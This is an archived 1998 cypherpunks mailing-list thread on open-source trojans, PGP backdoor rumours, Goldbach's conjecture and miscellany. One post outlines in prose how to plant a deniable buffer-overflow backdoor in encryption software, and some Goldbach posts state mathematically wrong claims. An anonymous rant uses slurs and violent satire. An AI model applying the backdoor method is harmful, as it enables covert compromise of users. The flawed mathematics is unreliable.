> >     
> >    
> >    There's a problem that could very badly effect the public perception
> >    of Linux and Open Source. I want people to think about this, and
> >    hopefully "head it off at the pass" before it happens.
> >    
> >    Perhaps it's already on your system today: a trojan-horse program. It
> >    might be a game, or more likely a system utility. It's author uploaded
> >    it to an FTP archive, where it was then picked up by your favorite
> >    Linux distribution, who wrote it onto the CD-ROM that you bought. It
> >    works just fine, but hidden away in the program is a special feature:
> >    a secret back-door past your system's security.
> >    
> >    Perhaps the author of this attack is tired of hearing about what great
> >    hackers we are, and wants to take us down a notch. He's patient - he
> >    will wait until his program is distributed to tens of thousands of
> >    Linux systems before he says a word. But say is what he'll do - he's
> >    not really interested in breaking into your system. What he wants is
> >    the publicity, bad publicity for us, and lots of it. We've left the
> >    gates open for this trojan horse. Let's talk about how to close them,
> >    and hope we have enough time to solve this problem before our
> >    reputation is hurt.
> 
> [mnoga tekct oodalyaty]
> 
> 
>     ____________________________________________________________________
>  
>              Technology cannot make us other than what we are.
> 
>                                            James P. Hogan
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 23 Nov 1998 14:28:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: update.403 (fwd)
Message-ID: <199811230600.AAA20501@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Nov 1998 11:40:29 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.403

> CLUSTERING AND COLLAPSE IN GRANULAR MATERIAL. 

> DOES CHAOS AFFECT THE COURSE OF AN ARMS RACE? 
> Yes, it may, particularly when great disparities exist between two
> nations' economies (as is the case with the US and Iraq), according
> to a new mathematical model developed by researchers in Japan
> (Mitsuo Kono, Chuo University, kono@fps.chuo-u.ac.jp, 011-81-
> 426-74-4161).  In an attempt to mathematically model the feedback
> between two adversarial nations as each builds up arms stocks,
> British scientist Lewis F. Richardson published in 1949 a well-
> known set of equations with variables describing such things as a
> nation's military spending levels and parameters quantifying factors
> such as a nation's internal pressure against military spending.  This
> model suffered from shortcomings, most notably that its linear
> equations provided all too predictable results; critics noted that
> many arms races spiral unpredictably out of control.   In the
> Japanese researchers' model a nation's reaction to an enemy's
> weapons buildup is not automatically to build more weapons but is
> instead a function of the difference in weapons and military
> spending between two nations.  This approach leads to more
> realistic nonlinear differential equations which quantify concepts
> normally unknown to physics, concepts such as fear, threat,
> grievance, and fatigue.  Their model shows an arms race can
> progress in a mathematically chaotic fashion when the economic
> situation of the two countries is different, but is more predictable
> when the economies are more comparable (Tomochi and Kono in
> the journal Chaos, December 1998.)

> CORRECTION.  A typo affecting a single letter can completely
> reverse the meaning of a sentence. Thus in Update 402 in the
> sentence "It is not thought that physics does differentiate between
> the forward or backward movement of time," "not" should be
> changed to "now."


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 23 Nov 1998 14:26:08 +0800
To: holist <cypherpunks@toad.com
Subject: Re: PGP compromised?
In-Reply-To: <199811222154.NAA25646@toad.com>
Message-ID: <3.0.5.32.19981123002423.00c18210@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:54 PM 11/22/98 -0800, holist wrote:
>I'm sorry if this is gnawing at old bones for you, but I recently heard from
>a rather paranoid, anonymous source here in Hungay that PGP was compromised,
>Zimmermann sold out to the Feds, all versions except possibly early DOS
>versions of PGP have back doors in them. 
>He is also claiming that the CIA have already provided the backdoor-key to
>PGP 5.0 to the Hungarian Secret Services. Is he being too paranoid, or what?

Pure disinformation.   It does have a few locally-customized twists to it.
As another poster said, you can get the source from www.pgpi.com,
check it out yourself, and compile it yourself.

There are some versions that have features allowing you to encrypt
data to multiple recipients, and some versions allow you to set this
with one or more recipients as the default (e.g. yourself,
or your corporate security officer.)  But you do not need to set this.

There are also some design bugs in the early DOS versions that make
them weaker than the later DOS versions or the newer versions,
so you don't want to use anything before 2.5 anyway.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 23 Nov 1998 14:47:33 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [spam 03.92/10.00 -pobox] Re: Goldbach's Conjecture - a question about prime sums of odd numbers...
In-Reply-To: <199811190522.XAA01164@einstein.ssz.com>
Message-ID: <3.0.5.32.19981123012140.00bab940@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:20 AM 11/19/98 -0600, Eric Cordian wrote:
>> Is there any work on whether odd numbers can always be represented as the
>> sum of primes? 
>
>Goldbach originally suggested that all numbers greater than two could be
>expressed as the sum of three primes, if one tossed in 1 as a prime
>number.  Euler pointed out that this was equivalent to even numbers
>greater than two being expressed as the sum of two primes. 
>
>This seemed a somewhat cleaner formulation, and it was adopted.

well, you can express any odd number >= 7 as
the sum of 3 + an even number, so if Goldbach's conjecture is true,
then three primes are enough for the odd natural numbers
except 1, which is a special case, and 3 and 5 which are prime anyway.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Tue, 24 Nov 1998 02:39:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <Pine.SOL.3.96.981122232742.12779A-100000@sparkle>
Message-ID: <v03102800b27f4dc25a93@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain



Frank O'Dwyer <fod@brd.ie> opines:
>
>Yes it does, but not quite in the same way. For example, I believe that
>in days of yore some attackers managed to insert a back door into some
>DEC OS by breaking into the coding environment (I don't recall the
>details, does anyone else?).

<http://www.acm.org/classics/sep95/> describes how the inventors
of Unix inserted a backdoor into the Unix login program. It's well
worth reading. However, there is no indication that this trojan
horse ever shipped to customers.

>So in other words, not only _could_ this
>happen with non-OSS, it _has_ happened, and no doubt it happens
>reasonably often.

I doubt it.

Martin Minow
minow@pobox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 24 Nov 1998 01:11:07 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Issues of crypto, politics, & chaos [sciencedaily.com]
Message-ID: <199811231622.KAA21494@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.sciencedaily.com/news/order_chaos.htm

>    Posted 10/8/98
>    Encryption Advance For Secure Global Communications 
>    Scientists at the Department of Energy's Los Alamos National
>    Laboratory have achieved a significant advance in demonstrating the
>    viability of an unbreakable encryption scheme for transmitting secure
>    communications to and from satellites.
>    
>    Posted 9/9/98
>    Mathematicians Prove That Group Decisions Can Be Impossible To Predict
>    For several years, some political scientists and others have argued
>    that group decisions such as elections are impossible to
>    anticipate-even if the preferences of the voters are well established
>    and the decision-making rules are set. Now there's a mathematical
>    proof to back that proposition.
>    
>    Posted 9/4/98
>    Chaos-Based System That "Evolves" Answers May Be Alternative To
>    Current Computers
>    A revolutionary new computing technique that uses a network of chaotic
>    elements to "evolve" its answers could provide an alternative to the
>    digital computing systems widely used today. Described for the first
>    time in the September 7 issue of Physical Review Letters this
>    "dynamics-based computation" may be well suited for optical computing
>    using ultra-fast chaotic lasers and computing with silicon/neural
>    tissue hybrid circuitry.

[text deleted]


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Tue, 24 Nov 1998 02:43:29 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <36595F29.C39B997A@brd.ie>
Message-ID: <Pine.SOL.3.91.981123103958.1388A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 23 Nov 1998, Frank O'Dwyer wrote:

> 
> Vlad Stesin wrote:
> > I don't quite understand the logic behind this. The fact that the
> > program's source is available is itself a proof that there are no
> > backdoors. Anyone can read the source code and make sure it's OK.
> 
> Anyone can, but does anyone? Also be aware that most people don't
> compile from source--it would be easy to doctor the source, compile a
> binary, and ship the trojan binary alongside the unmodified source.
>  

True enough.  Groups that produce software that play a critical role in 
security almost always sign the binaries.  

> Yes it does, but not quite in the same way. For example, I believe that
> in days of yore some attackers managed to insert a back door into some
> DEC OS by breaking into the coding environment (I don't recall the
> details, does anyone else?).

Break into the coding environment?  Does that mean they broke into
the VMS development shop?

> In short, this is a real problem, but it seems to be that the likes of
> Linux ought to be able to leverage its decentralised and parallel
> development model to address it in a more comprehensive manner than any
> closed centralised model could ever hope to achieve. "Many eyes"
> _should_ make for defence in depth against this--but it does look like
> some process is needed, and the Linux folk will need some kind of
> argument to convince people that it works. 

Already proven.  The emergent behavior of the Linux development model
does not need centralized process to coordinate it.  People who had
access to the source and were aware of the teardrop attack hacked a
patch to it almost immediately.  The patch was widely available the
next day.  How long did it take for microsoft?

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Mon, 23 Nov 1998 20:44:08 +0800
To: holist <cypherpunks@cyberpass.net
Subject: Re: your mail
In-Reply-To: <199811222154.NAA25646@toad.com>
Message-ID: <19981123115415.A26238@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Nov 22, 1998 at 01:54:42PM -0800, holist wrote:
> I'm sorry if this is gnawing at old bones for you, but I recently heard from
> a rather paranoid, anonymous source here in Hungay that PGP was compromised,
> Zimmermann sold out to the Feds, all versions except possibly early DOS
> versions of PGP have back doors in them. 

This is probably bullshit since the source is available to open view...

However, given that few have the technical skills to audit this source
I wonder how easy it would be to insert a backdoor and what form it
would take?

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

substitute "damn" every time you're inclined to write "very"; your
editor will delete it and the writing will be just as it should be.
        -- mark twain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 24 Nov 1998 05:37:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is Open Source safe? [Linux Weekly News]
Message-ID: <3659C59C.9979534D@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Frank O'Dwyer writes:
>                                       Here we're talking about
> deliberately inserted back doors. Those can get extremely nasty, and may
> be unpatchable. Examples include "data kidnap" (encrypting the target's
> information in situ and demanding a ransom for the decryption key), and
> "data cancer" (slow corruption of the target's information, ensuring
> that the backups are also corrupted). ...  I haven't heard of any real
> examples of such attacks, but that's not especially comforting.

The "data kidnap" scenario was tried with the "PC CYBORG (AIDS) virus"
(actually a Trojan) scare of 1989, where a disk with a database
application was sent to a number of recipients.  I think it scrambled
the FAT.  It gave a post office box in Panama for the ransom payments.  

-- 
	Jim Gillogly
	Highday, 3 Foreyule S.R. 1998, 20:23
	12.19.5.12.16, 8 Cib 9 Ceh, Fourth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: radinfo@real.com
Date: Tue, 24 Nov 1998 06:17:47 +0800
To: cypherpunks@toad.com
Subject: RealSystem G2 Ships
Message-ID: <199811232054.MAA10652@fmaila1.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain




TO REAL DEVELOPER PROGRAM MEMBERS

RealSystem G2, the next generation media delivery system is complete and ready
for purchase and production deployment!
 
Built from a completely new codebase, RealSystem G2 is the result of 2
years of software development and engineering breakthroughs.  

RealSystem G2 incorporates revolutionary advances, like SureStream, RealVideo
G2 (including compelling new video technology from Intel Corporation),
RealAudio G2 and SMIL support.

GET STARTED WITH REALSYSTEM G2 TODAY!
 Download RealServer G2
Members of the Real Developer Program can pick up a copy of the RealSystem G2
server in the Members Only area of the Devzone at 
http://proforma.real.com/svdl/realdev.html

 Download RealSystem G2 Authoring Kit and get started producing content
today.

Go to
http://www.real.com/devzone/library/creating/index.html

 Learn more about RealSystem G2
Find out the latest about RealSystem G2 at
http://www.real.com/g2/index.html


WHAT'S NEW IN REALSYSTEM G2 SINCE BETA2
With this RealSystem G2 announcement we are also launching a new line of
production tools that will make getting started even easier, and provide
increased power for current users. 

Check out our new tools including RealProducer G2, RealProducer Plus G2.
 
 The free RealProducer G2 creates basic RealAudio and RealVideo and is
available for immediate download.
http://www.real.com/products/tools/producer/index.html

 The new RealProducer Plus G2 is the premium tool for creating RealAudio and
RealVideo and is available for immediate purchase and download.
http://www.real.com/products/tools/producerplus/index.html

 RealProducer Plus G2 creates the best end user experiences:
 Streams the best quality content to all connection speed allows and
dynamically adjusts to congested network conditions
 Allows content creators to custom tailored their content by allowing exact
data rates specification, Codec selection, and video frame rate.


To learn more about RealSystem G2 and to see the latest applications, visit
our Technology Showcase at
http://www.real.com/showcase/index.html

Thank you for your time and consideration, and best regards.

Kristi Larsen
Real Developer Program 
RealNetworks, Inc.
Visit the Devzone Today!
http://www.real.com/devzone

-----Feature Detail-------
RealSystem G2 is a complete, modular, open standards-based, cross-platform
software media system, with full support for RTSP and SMIL. 

Some of the most exciting features of RealSystem G2 include:

+ SureStream, a breakthrough technology that dynamically monitors and adjusts
throughput up or down based on network capacity.

+ RealAudio G2 which delivers 80% greater frequency response and superior
packet loss resilience.

+ RealVideo G2, incorporating Intel Streaming Web Video technology, delivering
30 frames per second support. 

+ Support for SMIL and advanced streaming media datatypes, RealText, RealPix,
and RealFlash allowing you to create rich multimedia presentations. 

  + The ability to serve native datatypes like AU, MPEG, AIFF, WAV, VIV and
more.

    + An extensible, Standards-based, open architecture, with support for
SMIL, RTSP, and IP Multicast.

  + Advanced Networking, featuring Caching support, Splitting, Firewall
support, and Load Balancing.

---------------------------------------------
For information about this e-mail including how to subscribe or unsubscribe
from future announcements, please visit:

http://www.real.com/mailinglist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Mon, 23 Nov 1998 21:49:11 +0800
To: Vlad Stesin <rmiles@Generation.NET>
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <Pine.SOL.3.96.981122232742.12779A-100000@sparkle>
Message-ID: <36595F29.C39B997A@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Vlad Stesin wrote:
> I don't quite understand the logic behind this. The fact that the
> program's source is available is itself a proof that there are no
> backdoors. Anyone can read the source code and make sure it's OK.

Anyone can, but does anyone? Also be aware that most people don't
compile from source--it would be easy to doctor the source, compile a
binary, and ship the trojan binary alongside the unmodified source.
 
> However, this argument does hold against non-OSS. 

Yes it does, but not quite in the same way. For example, I believe that
in days of yore some attackers managed to insert a back door into some
DEC OS by breaking into the coding environment (I don't recall the
details, does anyone else?). So in other words, not only _could_ this
happen with non-OSS, it _has_ happened, and no doubt it happens
reasonably often.

In short, this is a real problem, but it seems to be that the likes of
Linux ought to be able to leverage its decentralised and parallel
development model to address it in a more comprehensive manner than any
closed centralised model could ever hope to achieve. "Many eyes"
_should_ make for defence in depth against this--but it does look like
some process is needed, and the Linux folk will need some kind of
argument to convince people that it works. 

Perhaps a start would be for individuals to essentially certify software
that they had personally checked, offering repositories with detached
signatures for specific versions of software compiled in a certain way.
Software that hadn't yet been certified or which didn't match sufficient
independent signatures could then be referred to a human for checking,
and if it was OK then that version of the software could also be signed.
This would also serve as a highly visible "yes, we have checked this for
back doors" statement..."and here are 1,000s of signatures to prove it"
:)

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 23 Nov 1998 21:25:15 +0800
To: cypherpunks@Algebra.COM
Subject: Reptilian Nazi $oftware
Message-ID: <199811231300.OAA23807@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



While playing Spin the Whiskey Bottle with my dog, an
entirely accidental motion caused a search engine to 
barf this up:

http://www.letr.com/swat.html

"Here's the ultimate 'SWAT' program - from intelligence 
gathering to incident command - with add on modules 
for tracking , training and performance evaluations !

...

"Complete detailed information on suspect description 
and history Information includes: 

  o Religious and cultural background 
  o political affiliations
  o psychological and medical disorders
  o likes and dislikes
  o family members
  o close relationships
  o employer and co-workers
  o motivational factors

"Designed by Sergeant Gary Rovarino
LASD SWAT Team Leader"

(is _anyone_ taking names???)

I _thought_ I also saw, but can't be sure:

"We get almost as high writing and selling this software
as our users do kicking in doors and shooting greasers in
the back!" - Trembley Nerdwater, programmer

[A Deep Gargling Source To Be Named Later reveals that when 
they get the foreign language versions of this software 
working, sales to Third World Nazi ButtFucktatorships 
should almost rival sales to police forces in U.S. and 
European Nazi ButtFucktatorships.]

Optional modules include:

  o Instant Download From Deathlist Computer

    For those slow nights when the squad is in danger
    of losing its edge. Includes Random Hit Selector,
    Semiautomatic Route Selector, and optional route
    selection by pizza and titty bar locations.

  o Family Member and Associates Deathlist Upload

    For tidying up those loose ends. New data found on
    or near the perp's body can be entered in the field.

  o Special OKC Witness List

    For units with assigned responsibility for keeping
    the lid on _that_ one! Includes on line link to
    DOJ, FBI, ATF and specially assigned judges for
    authorization of special field actions against
    witnesses who have suddenly recovered their memories,
    gotten religion, have been reading unauthorized
    radical literature such as the U.S. "Constitution."
    Remember our motto, "Loose Lips Can Always Be Stapled
    Together."

  o Waco Tutorial

    Learn from the masters! No prisoners, no survivors!
    No bad press! Includes tips on obscuring causes of 
    death by agglutinating bodies together! Confound
    medical examiners by combining pieces of perps to
    make remains that have been shot, gassed, burned,
    asphyxiated, strangled, decapitated, disemboweled,
    etc.!

  o Portable Press Dossier

    Be able to pull up the files of inquisitive reporters
    in real time! Get instant and unprecedented 
    cooperation!

Buy now and get testosterone supplements* at no additional
charge! You must provide your own adrenalin. Remember! The
rush is not on the radio -- it's going through the door!

*suppositories only

ButtFuckMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 24 Nov 1998 07:31:55 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - the various definitions (fwd)
Message-ID: <199811232253.QAA22907@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 24 Nov 1998 06:03:43 +0100
> From: "Albert P. Franco, II" <apf2@apf2.com>
> Subject: Re: Goldbach's Conjecture - the various definitions

> Math works because in most (we would like to say all...) cases it is WELL
> DEFINED. Subtle differences in the definition of a problem can drastically
> alter the solution.

Absolutely.

> Goldbach's Conjecture states that any EVEN OR ODD
> number can be expressed by a sum of three primes.

No, Goldbach's says specificaly EVEN numbers.

> lose sight of the domains of the two statements. He never stated that ODD
> numbers could be expressed as sums of TWO primes.

Nobody said he did.

> It is very important to get all of the information assembled before running

Absolutely.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 24 Nov 1998 08:04:08 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Goldbach & Sum's of two primes to odd numbers
Message-ID: <199811232323.RAA23119@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Somebody explain how to odd numbers added together make a third odd number.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 24 Nov 1998 08:02:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (RAM) under Windows") (fwd)
Message-ID: <199811232327.RAA23206@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Jim Adler" <jadler@soundcode.com>
> Subject:  Re: Securing data in memory (was "Locking physical memory (RAM) under Windows")
> Date: Sat, 7 Nov 1998 22:47:48 -0800

> SCNSM 1.0 Beta, a non-swappable memory allocator for Windows 3.x/95/98, is
> available and can be downloaded from

[text deleted]

> The SCNSM driver supports allocation of non-swappable memory on Windows
> 3.x/95/98. The principal design goal of SCNSM is to provide memory that will
> not be swapped to disk, under any circumstances. Typically, security
> applications require such memory to store private keys, passwords, and
> sensitive intermediate results of cryptographic calculations.

[text deleted]

Sounds cool, but I have a couple of questions:

1.  Is it OpenSource?

2.  I assume since it never swaps to disk the memory requirements for the
    computer are large. What is the minimum suggested if one runs say
    5 apps that each require 16M each, 5*16M & OS overhead? And what is
    the suggested OS overhead with no swap to disk?

    (OK, that last one might be a 3rd question)


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 24 Nov 1998 10:38:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A tad more on Goldbach's...
In-Reply-To: <199811240103.TAA23512@einstein.ssz.com>
Message-ID: <v03130310b27fc39f976f@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:03 PM -0800 11/23/98, Jim Choate wrote:
>I figure I'll drop a couple of more points on this since nobody else seems to
>have twigged to them....

Your reputation capital has already dropped so many points that I'm not
sure you _can_ drop a couple of more points.

Please take your bizarre theories about Goldbach's Conjecture to some
mathematics journals and see if you can get published. Writing dozens of
crankish articles about your theories about prime numbers, and tiling
triangles, and such is just plain eccentric.

(Eccentric curve cryptography?)

And basing big chunks of your argument on why 1 or 2 or whatever should or
should not be defined as prime is just plain sophistry.

Ditto for your bizarre theories about how electric fields work, about how
charges inside conducting spheres don't follow Gauss's Law, and other
crankish theories about electricity.

Give it a rest.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 24 Nov 1998 03:24:49 +0800
To: fod@brd.ie
Subject: how to insert plausibly deniable back-doors (Re: Is Open Source safe? [Linux Weekly News])
In-Reply-To: <36595F29.C39B997A@brd.ie>
Message-ID: <199811231837.SAA14774@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




I reckon an easy and plausibly deniable way to insert a backdoor is to
purposefully make the software vulnerable to buffer overflow (the good
old unchecked gets(3) type of bug, of which a new one is found weekly
in sendmail).

Then send the target an encrypted spam or whatever which their program
decrypts, and in the process exploits the buffer overflow and allows
you to execute arbitrary code, which you use to patch the binary, or
install a keyboard sniffer or whatever.  Works better with DOS/windows
-- with no protection -- you could format the disk if you wanted.
unix a bit more tricky, but doable nonetheless -- enough OS security
vulnerabilities to send along a program to obtain root, and then patch
the binary.

Nice and deniable too, if someone finds the vulnerability, you go
`whoops!' and remove it.

I spent a few hours examining pgp263i for buffer overflow
opportunities, but found no exploitable opportunities in that quick
search.

Areas where things almost work from offerflow is fixed size buffer for
storage of -----BEGIN BLAH----- lines, and I did wonder about the
decompression code also -- quite hairy, and undefined behaviour may
just be obtainable with the right carefully corrupted message sent in.

This exercise ought to be done on pgp5.x and 6.x.  I have spent some
time looking at the code in general -- yuck -- OO overdone, very hard
to read due to the many many levels of inheritence and so on, you
really need to run it under a debugger to even figure out what would
happen half the time.  I think I preferred pgp263 for readability and
clarity.  Werner Koch's GNUPG gets an A+ for coding clarity also --
way better than either pgp2.x and pgp5.x.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Tue, 24 Nov 1998 03:55:39 +0800
To: Martin Minow <minow@pobox.com>
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <Pine.SOL.3.96.981122232742.12779A-100000@sparkle>
Message-ID: <3659B025.756B888A@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Martin Minow wrote:
> Frank O'Dwyer <fod@brd.ie> opines:
> >
> >Yes it does, but not quite in the same way. For example, I believe that
> >in days of yore some attackers managed to insert a back door into some
> >DEC OS by breaking into the coding environment (I don't recall the
> >details, does anyone else?).
> 
> <http://www.acm.org/classics/sep95/> describes how the inventors
> of Unix inserted a backdoor into the Unix login program. It's well
> worth reading. However, there is no indication that this trojan
> horse ever shipped to customers.

No, that is a different incident. These were external attackers who
managed to patch the source, and as far as I know it did ship. Could be
an urban myth I guess, but it's clearly a plausible attack.

> >So in other words, not only _could_ this
> >happen with non-OSS, it _has_ happened, and no doubt it happens
> >reasonably often.
> 
> I doubt it.

OK, "reasonably often" is overstating it, perhaps :) 

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 24 Nov 1998 09:33:37 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: A tad more on Goldbach's...
Message-ID: <199811240103.TAA23512@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



I figure I'll drop a couple of more points on this since nobody else seems to
have twigged to them....

Goldbach's original conjecture is crap. There is NO way that 3 odd numbers
will ever equal an even number. Odd + Odd is Even. Even + Odd is Odd. Fermat
was a hell of a lot more charitable to the original assertion than I would
have been.

Goldbach's existing conjecture can be worded another way:

Any even number may be represented by the sum of 3 even numbers provided two
of the numbers are 1 less than a prime and we add 2.

It's obvious that an even number can always be the sum of other even
numbers, it's axiomatic. The question actualy is:

Is the set of even numbers whose members are one less than the corresponding
member of the primes sufficient, when added to 2, to sum to all the even
numbers.

As far as I can find nobody has written a lot on patterns of even numbers 1
less than the odds. There's not even a name for the set that I can find.

As to somebodies assertion that an odd number can be represented by the sum
of two odds, better study your math a tad better. Odd + Odd is *always*
Even, never Odd.

Happy Thanksgiving!


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Tue, 24 Nov 1998 03:59:32 +0800
To: Jim Burnes - Denver <jim.burnes@ssds.com>
Subject: Re: Is Open Source safe? [Linux Weekly News]
In-Reply-To: <Pine.SOL.3.91.981123103958.1388A-100000@denver>
Message-ID: <3659B24C.2E121981@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim Burnes - Denver wrote:
> Already proven.  The emergent behavior of the Linux development model
> does not need centralized process to coordinate it.  People who had
> access to the source and were aware of the teardrop attack hacked a
> patch to it almost immediately.  The patch was widely available the
> next day.  How long did it take for microsoft?

Agreed, but that's a different issue. Here we're talking about
deliberately inserted back doors. Those can get extremely nasty, and may
be unpatchable. Examples include "data kidnap" (encrypting the target's
information in situ and demanding a ransom for the decryption key), and
"data cancer" (slow corruption of the target's information, ensuring
that the backups are also corrupted). Quickly patching the software that
delivers those attacks isn't anough--you need a defence against it being
introduced and activated in the first place. I haven't heard of any real
examples of such attacks, but that's not especially comforting.

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 24 Nov 1998 10:39:12 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
